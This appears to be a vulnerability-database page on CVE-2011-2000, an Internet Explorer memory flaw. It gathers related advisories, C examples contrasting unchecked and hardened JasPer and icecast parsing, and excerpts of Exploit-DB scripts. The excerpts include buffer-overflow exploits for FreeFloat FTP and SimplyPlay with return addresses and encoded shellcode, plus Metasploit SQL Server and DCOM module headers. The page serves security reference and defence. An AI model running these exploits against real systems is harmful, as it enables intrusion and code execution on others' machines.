CVE-2011-2000
Published: 2011-10-12
Priority: P3 53 · critical · CVSS 2.0 base score 9.3
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EPSS: 18.89% (96.9th percentile)
Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Body Element Remote Code Execution Vulnerability."
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| vendor_redhat | — | 6.8 | MEDIUM | — |
GHSA
GHSA-hrr3-r677-j752 · ghsa_unreviewed · 2022-05-13 · CVE-2011-2000 [HIGH]
Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Body Element Remote Code Execution Vulnerability."
Kernel
namei: allow restricted O_CREAT of FIFOs and regular files
kernel_security · 2018-08-23 · CVSS 7.2 · CVE-2000-1134 [HIGH]
Disallows open of FIFOs or regular files not owned by the user in world
writable sticky directories, unless the owner is the same as that of the
directory or the file is opened without the O_CREAT flag. The purpose
is to make data spoofing attacks harder. This protection can be turned
on and off separately for FIFOs and regular files via sysctl, just like
the symlinks/hardlinks protection. This patch is based on Openwall's
"HARDEN_FIFO" feature by Solar Designer.
This is a brief list of old vulnerabilities that could have been prevented
by this feature, some of them even allow for privilege escalation:
CVE-2000-1134
CVE-2007-3852
CVE-2008-0525
CVE-2009-0416
CVE-2011-4834
CVE-2015-1838
CVE-2015-7442
CVE-2016-7489
This list is no
Red Hat
jasper: heap buffer overflow in jpc_dec_cp_setfromcox() (rejected duplicate of CVE-2011-4516)
vendor_redhat · 2016-10-17 · CVSS 6.8 · CVE-2016-8880 [MEDIUM] · CWE-122
[REJECTED CVE] A heap-based buffer overflow flaw was found in the way JasPer decoded JPEG 2000 compressed image files. An attacker could create a malicious JPEG 2000 compressed image file that, when opened, would cause applications that use JasPer (such as Nautilus) to crash or, potentially, execute arbitrary code.
Statement: This flaw was found to be a duplicate of CVE-2011-4516. Please see https://access.redhat.com/security/cve/CVE-2011-4516 for information about affected products and security errata.
Package: netpbm (Red Hat Enterprise Linux 5) - Not affected
Package: jasper (Red Hat Enterprise Linux 6) - Not affected
Package: jasper (Red Hat Enterprise Linux 7) - Not affected
Package: mi
Red Hat
jasper: insufficient memory allocation in jpc_crg_getparms() (rejected duplicate of CVE-2011-4517)
vendor_redhat · 2016-10-17 · CVSS 6.8 · CVE-2016-8881 [MEDIUM] · CWE-122
[REJECTED CVE] A heap-based buffer overflow flaw was found in the way JasPer decoded JPEG 2000 compressed image files. An attacker could create a malicious JPEG 2000 compressed image file that, when opened, would cause applications that use JasPer (such as Nautilus) to crash or, potentially, execute arbitrary code.
Statement: This flaw was found to be a duplicate of CVE-2011-4517. Please see https://access.redhat.com/security/cve/CVE-2011-4517 for information about affected products and security errata.
Package: netpbm (Red Hat Enterprise Linux 5) - Not affected
Package: jasper (Red Hat Enterprise Linux 6) - Not affected
Package: jasper (Red Hat Enterprise Linux 7) - Not affected
Packag
Red Hat
jasper: heap buffer overflow flaws lead to arbitrary code execution (CERT VU#887409)
vendor_redhat · 2011-12-08 · CVSS 6.8 · CVE-2011-4517 [MEDIUM] · CWE-122
The jpc_crg_getparms function in libjasper/jpc/jpc_cs.c in JasPer 1.900.1 uses an incorrect data type during a certain size calculation, which allows remote attackers to trigger a heap-based buffer overflow and execute arbitrary code, or cause a denial of service (heap memory corruption), via a crafted component registration (CRG) marker segment in a JPEG2000 file.
A heap-based buffer overflow flaw was found in the way JasPer decoded JPEG 2000 compressed image files. An attacker could create a malicious JPEG 2000 compressed image file that, when opened, would cause applications that use JasPer (such as Nautilus) to crash or, potentially, execute arbitrary code.
Red Hat
jasper: heap buffer overflow flaws lead to arbitrary code execution (CERT VU#887409)
vendor_redhat · 2011-12-08 · CVSS 6.8 · CVE-2011-4516 [MEDIUM] · CWE-122
Heap-based buffer overflow in the jpc_cox_getcompparms function in libjasper/jpc/jpc_cs.c in JasPer 1.900.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted numrlvls value in a coding style default (COD) marker segment in a JPEG2000 file.
A heap-based buffer overflow flaw was found in the way JasPer decoded JPEG 2000 compressed image files. An attacker could create a malicious JPEG 2000 compressed image file that, when opened, would cause applications that use JasPer (such as Nautilus) to crash or, potentially, execute arbitrary code.
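Both JasPer entries above come down to a file-controlled count or size driving a fixed-size or undersized buffer. What follows is an added C model of the COD case (CVE-2011-4516), written for this page and not libjasper code: a minimal parser of the SPcod fields with a 33-entry per-resolution-level table (JPC_MAXRLVLS is the constant JasPer uses), the same loop in unchecked and hardened form, and a constructed segment declaring 64 decomposition levels. Instead of corrupting memory, the unchecked mode counts how many entries would land past the table; the struct layout, field names and function names are the example's own simplification of the real code.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define JPC_MAXRLVLS 33      /* size of the per-component rlvls[] table in JasPer */
#define JPC_COX_PRT  0x01    /* Scod/Scoc bit: custom precinct sizes follow */

struct coxrlvl { uint8_t parwidthval, parheightval; };

/* Simplified stand-in for JasPer's component coding parameters. */
struct compparms {
    uint8_t csty;
    int     numdlvls;               /* decomposition levels, SPcod byte 0 */
    int     numrlvls;               /* resolution levels = numdlvls + 1 */
    uint8_t cblkwidthval, cblkheightval, cblksty, qmfbid;
    struct coxrlvl rlvls[JPC_MAXRLVLS];
    int     overrun;                /* entries the unchecked loop would write past rlvls[] */
};

/* Parse the SPcod/SPcoc bytes of a COD/COC marker segment. `csty` is the
 * Scod byte. Returns 0 on success, -1 on rejection. With hardened == 0 the
 * numrlvls bound is not enforced, as in JasPer 1.900.1; this model stops at
 * the end of the table and records the overrun instead of writing out of
 * bounds, which is the only difference from the original loop shape. */
int cox_getcompparms(const uint8_t *buf, size_t len, uint8_t csty,
                     struct compparms *cp, int hardened)
{
    size_t pos = 0;
    if (len < 5)
        return -1;
    memset(cp, 0, sizeof *cp);
    cp->csty          = csty;
    cp->numdlvls      = buf[pos++];
    cp->numrlvls      = cp->numdlvls + 1;
    cp->cblkwidthval  = buf[pos++];
    cp->cblkheightval = buf[pos++];
    cp->cblksty       = buf[pos++];
    cp->qmfbid        = buf[pos++];
    if (hardened && cp->numrlvls > JPC_MAXRLVLS)
        return -1;                                  /* the missing bound check */
    if (csty & JPC_COX_PRT) {
        for (int i = 0; i < cp->numrlvls; ++i) {    /* file-controlled trip count */
            if (pos >= len)
                return -1;
            uint8_t b = buf[pos++];
            if (i >= JPC_MAXRLVLS) {                /* original code keeps writing here */
                cp->overrun++;
                continue;
            }
            cp->rlvls[i].parwidthval  = b & 0x0f;
            cp->rlvls[i].parheightval = (b >> 4) & 0x0f;
        }
    }
    return 0;
}

/* Constructed sample: 64 decomposition levels (65 rlvls, the spec allows at
 * most 32/33), code-block 16x16, no cblk style, 5/3 filter, then one
 * precinct-size byte per declared level. */
size_t build_crafted_spcod(uint8_t *out, size_t cap)
{
    size_t n = 0;
    if (cap < 5 + 65)
        return 0;
    out[n++] = 64; out[n++] = 4; out[n++] = 4; out[n++] = 0; out[n++] = 1;
    for (int i = 0; i < 65; i++)
        out[n++] = 0x88;
    return n;
}

/* Returns the overrun the unchecked parser records (hardened == 0), or -1
 * when the hardened parser rejects the same bytes. */
int demo_crafted(int hardened)
{
    uint8_t buf[128];
    struct compparms cp;
    size_t len = build_crafted_spcod(buf, sizeof buf);
    if (cox_getcompparms(buf, len, JPC_COX_PRT, &cp, hardened) < 0)
        return -1;
    return cp.overrun;
}

/* A well-formed segment with 5 decomposition levels parses in both modes. */
int demo_benign(void)
{
    const uint8_t buf[] = { 5, 4, 4, 0, 1, 0x88, 0x88, 0x88, 0x88, 0x88, 0x88 };
    struct compparms cp;
    if (cox_getcompparms(buf, sizeof buf, JPC_COX_PRT, &cp, 1) < 0)
        return -1;
    return cp.numrlvls;
}

int main(void)
{
    printf("unchecked: %d entries written past rlvls[]\n", demo_crafted(0));
    printf("hardened : %s\n", demo_crafted(1) < 0 ? "segment rejected" : "accepted");
    printf("benign   : %d resolution levels\n", demo_benign());
    return 0;
}
```

The CRG case (CVE-2011-4517) is the same pattern one step earlier: the element count comes from the file and the allocation is sized with the wrong element type, so the fix there is a correct sizeof plus the same count check rather than a loop bound.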
No detection rules found.
Exploit-DB
NSHC Papyrus 2.0 - Heap Overflow
exploitdb · 2011-08-13
---
#!/usr/bin/python
#
# Title: NSHC Papyrus Heap Overflow Vulnerability
# Date: 13\08\2011
# Author: wh1ant
# Software Link: http://file.atfile.com/ftp/data/03/PapyrusSetup.exe
# Version: 2.0
# Tested On: windows XP SP3 South Korea / windows XP SP3 English VMware Workstation
# CVE: N/A
# Notice:
# Encrypt/Decrypt programs that are created by NSHC
#
# Builds the crafted input file: 1003 'A's, then "BBBB" and "CCCC" as
# markers to locate overwritten fields in the debugger, then 2000 more 'A's.
fd = open("Attack.txt", "w")
data = 'A'
for i in range(0, 1003):
    fd.write(data)
fd.write("BBBB")
fd.write("CCCC")
for i in range(0, 2000):
    fd.write(data)
fd.close()
Exploit-DB
Freefloat FTP Server 1.0 - 'MKD' Remote Buffer Overflow
exploitdb · 2011-07-17
---
#!/usr/bin/ruby
#
#[+]Exploit Title: FreeFloat FTP Server MKD Buffer Overflow Exploit
#[+]Date: 16\06\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
#[+]Version: 1.00
#[+]Tested On: Windows XP SP3 Brazilian
#[+]CVE: N/A
#
#
require 'socket'

def banner()
  print """
==========FreeFloat FTP Server MKD Buffer Overflow Exploit=======
==========Autor C4SS!0 G0M3S=====================================
==========E-mail [email protected]============================
"""
end

# Logs in with test/test and sends the oversized MKD argument.
def exploit(buf,ip,porta)
  begin
    s = TCPSocket.new(ip,porta.to_i)
    s.recv(20000)
    s.puts "USER test\r\n"
    s.recv(2000)
    s.puts "PASS test\r\n"
    s.recv(2000)
    s.puts "MKD #{buf}\r\n"
    s.close
    s = TCPSocket.new(ip,
Exploit-DB
SimplyPlay 66 - '.pls' Local Buffer Overflow
exploitdb · 2011-04-14
---
#!/usr/bin/perl
#
#[+]Exploit Title: SimplyPlay V.66 .PLS File Buffer Overflow Vulnerability
#[+]Date: 14\04\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/SimplyPlay.shtml
#[+]Version: Revision 66
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
print q{
Exploit Buffer Overflow Revision:66(UNICODE - SEH)
Created BY C4SS!0 G0M3S
E-mail [email protected]
Site www.exploit-br.org
};
sleep(1);
$buf = "\x41" x 2000;
$buf .= "\x41" x 53;
$buf .= "\x58\x50";
$buf .= "\xa9\x45";#P/P/RETN 0x004500A9
$buf .= "\x41\x50\x61\xc9\xc8\x41\x50\x41\xc3";
$buf .= "\x41" x 11;
$buf .=
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ".
"ABABQI1
Exploit-DB
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
exploitdb · 2011-02-08 · CVE-2008-5416
---
##
# $Id: ms09_004_sp_replwritetovarbin_sqli.rb 11730 2011-02-08 23:31:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection',
      'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Window
Exploit-DB
Microsoft SQL Server - Payload Execution (via SQL Injection) (Metasploit)
exploitdb · 2011-02-08 · CVE-2000-1209
---
##
# $Id: mssql_payload_sqli.rb 11730 2011-02-08 23:31:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Microsoft SQL Server Payload Execution via SQL injection',
      'Description' => %q{
This module will execute an arbitrary payload on a Microsoft SQL
Server, using a SQL injection vulnerability.
Once a vulnerability is identified this module
will use xp_cmdshell to upload and execute Metasploit payloads.
It is necessary to specify the exact point where th
Exploit-DB
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
exploitdb · 2011-01-24 · CVE-2008-5416
---
##
# $Id: ms09_004_sp_replwritetovarbin.rb 11631 2011-01-24 19:37:58Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption',
      'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,
and Microsoft Desktop
Exploit-DB
Microsoft RPC DCOM Interface - Remote Overflow (MS03-026) (Metasploit)
exploitdb · 2011-01-11 · CVE-2003-0352
---
##
# $Id: ms03_026_dcom.rb 11545 2011-01-11 17:56:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Microsoft RPC DCOM Interface Overflow',
      'Description' => %q{
This module exploits a stack buffer overflow in the RPCSS service, this vulnerability
was originally found by the Last Stage of Delirium research group and has been
widely exploited ever since. This module can exploit the English versions of
Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windo
Zscaler
Zscaler found Multiple Security Vulnerabilities | 11-11-2011
blogs_zscaler · CVSS 9.3 [CRITICAL]
Bugzilla
CVE-2011-4612 icecast2: Newline injection in error.log
bugzilla · 2011-12-15 · CVSS 5.0 · CVE-2011-4612 [MEDIUM]
A security bug was reported by Moritz Naumann against icecast in
Ubuntu. You are being emailed as the upstream contact. Please keep
[email protected][1] CC'd for any updates on this issue.
This issue should be considered public and has not yet been assigned a
CVE.
Details from the public bug follow:
https://launchpad.net/bugs/894782
From the reporter:
"Newline injection in error.log
Running this command against an icecast2 running on 127.0.0.1...
echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d%0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d%0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN%20fserve/fserve_client_create%20req%20for%20file%20"'"'"/usr/share/icecast2/web/ HTTP/
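The injection the reporter demonstrates works because the percent-decoded request path reaches error.log with its CR/LF intact, so one request produces what reads as two log records. The following is an added C example, not icecast code: a percent-decoder standing in for the server's, a log-field escaper that neutralises control characters before the write, and a constructed request modelled on the report's command (the forged timestamp and "PHUN" text are constructed), showing the same input yielding two lines unescaped and one line escaped. Function names are the example's own.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

static int hexval(unsigned char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = (unsigned char)tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Percent-decode a request path the way a server does before using it.
 * Malformed escapes are copied through unchanged. Returns the decoded length. */
size_t url_decode(const char *in, char *out, size_t cap)
{
    size_t n = 0;
    for (size_t i = 0; in[i] && n + 1 < cap; i++) {
        int h, l;
        if (in[i] == '%' &&
            (h = hexval((unsigned char)in[i + 1])) >= 0 &&
            (l = hexval((unsigned char)in[i + 2])) >= 0) {
            out[n++] = (char)(h * 16 + l);
            i += 2;
        } else {
            out[n++] = in[i];
        }
    }
    out[n] = '\0';
    return n;
}

/* Escape anything that can break the one-record-per-line log format:
 * CR, LF and every other C0/DEL control byte become \xNN, and a literal
 * backslash is doubled so the escaping stays unambiguous.
 * Returns the number of bytes that had to be escaped. */
int log_escape(const char *in, char *out, size_t cap)
{
    size_t n = 0;
    int esc = 0;
    for (size_t i = 0; in[i]; i++) {
        unsigned char c = (unsigned char)in[i];
        if (c < 0x20 || c == 0x7f) {
            if (n + 5 > cap) break;                      /* 4 chars + NUL */
            n += (size_t)snprintf(out + n, cap - n, "\\x%02X", c);
            esc++;
        } else if (c == '\\') {
            if (n + 3 > cap) break;
            out[n++] = '\\'; out[n++] = '\\';
            esc++;
        } else {
            if (n + 2 > cap) break;
            out[n++] = (char)c;
        }
    }
    out[n] = '\0';
    return esc;
}

/* Records a log reader would see: 1 + number of LF bytes. */
int count_lines(const char *s)
{
    int n = 1;
    for (; *s; s++) if (*s == '\n') n++;
    return n;
}

/* Number of escaped bytes in a string, via a scratch buffer. */
int escaped_count(const char *s)
{
    char buf[512];
    return log_escape(s, buf, sizeof buf);
}

/* Constructed request path modelled on the reporter's command: the %0d%0a
 * ends the genuine record and the remainder impersonates a second one. */
static const char *CRAFTED_PATH =
    "/non-existent%20No%20such%20file%0d%0a[1970-01-01%2000:00:00]%20PHUN%20forged";

/* Log lines produced when the decoded path is written verbatim. */
int unsafe_log_lines(void)
{
    char decoded[256];
    url_decode(CRAFTED_PATH, decoded, sizeof decoded);
    return count_lines(decoded);
}

/* Log lines produced when the decoded path is escaped first. */
int safe_log_lines(void)
{
    char decoded[256], escaped[512];
    url_decode(CRAFTED_PATH, decoded, sizeof decoded);
    log_escape(decoded, escaped, sizeof escaped);
    return count_lines(escaped);
}

int main(void)
{
    char decoded[256], escaped[512];
    url_decode(CRAFTED_PATH, decoded, sizeof decoded);
    log_escape(decoded, escaped, sizeof escaped);
    printf("verbatim -> %d record(s)\n", unsafe_log_lines());
    printf("escaped  -> %d record(s): %s\n", safe_log_lines(), escaped);
    return 0;
}
```

The escaper is applied to the untrusted field only, after decoding and immediately before the write, so the timestamp and level the server prepends stay authoritative and a reader cannot be fed a forged record through the request line.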
References
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-081
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13083
Published: 2011-10-12